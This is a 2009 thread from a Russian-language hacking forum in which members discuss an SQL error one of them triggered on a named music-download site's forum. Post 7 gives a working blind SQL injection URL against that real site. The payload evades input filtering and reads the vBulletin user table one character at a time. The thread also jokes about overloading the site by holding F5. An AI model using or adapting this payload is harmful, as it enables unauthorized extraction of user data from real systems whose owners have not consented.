Недоинджект !!!

Discussion in 'Песочница' started by ReduKToR, 6 Jun 2009.

  1. ReduKToR

    ReduKToR Active Member

    Joined:
    5 Jan 2009
    Messages:
    257
    Likes Received:
    179
    Reputations:
    4
    корочь проходился по форуму,случайно поставил ковычку....и фот что вышло

    собственно я в шоке, кто что скажет по этому сабжу?
     
  2. ReduKToR

    ReduKToR Active Member

    Joined:
    5 Jan 2009
    Messages:
    257
    Likes Received:
    179
    Reputations:
    4
    тупая фильтрация? можно чтонить полезное извлечь?
     
  3. ReduKToR

    ReduKToR Active Member

    Joined:
    5 Jan 2009
    Messages:
    257
    Likes Received:
    179
    Reputations:
    4
    как видно по сайту, ктото пользуется F5 ))) сайт ели дышыт...
    Ы
     
  4. gLuk!

    gLuk! New Member

    Joined:
    27 Mar 2009
    Messages:
    27
    Likes Received:
    0
    Reputations:
    0
    ничего полезного не извлечь
     
  5. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    Все нормально. Это специальная защита, чтобы кульхацкер ломал дня 2 голову ...
     
  6. ReduKToR

    ReduKToR Active Member

    Joined:
    5 Jan 2009
    Messages:
    257
    Likes Received:
    179
    Reputations:
    4
    DDoSька,да? а ты перейди и F5 зажми =)

    плохая защита
     
  7. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    Слепая скуль + фильтрация, вот так можно получать данные:
    Code:
    http://forum.freshmp3.ru/search.php?searchid=2364696&photoplog_searchinfo=1'/**/and/**/if(53=ord(substring((select/**/5/**/from/**/vb3_user/**/limit/**/0,1),1,1)),(select/**/1/**/from/**/information_schema.columns),'')/**/and/**/1='1
    В случае true будет выдавать ошибку, в случае false страницу форума
     
    #7 l-l00K, 6 Jun 2009
    Last edited: 6 Jun 2009
    5 people like this.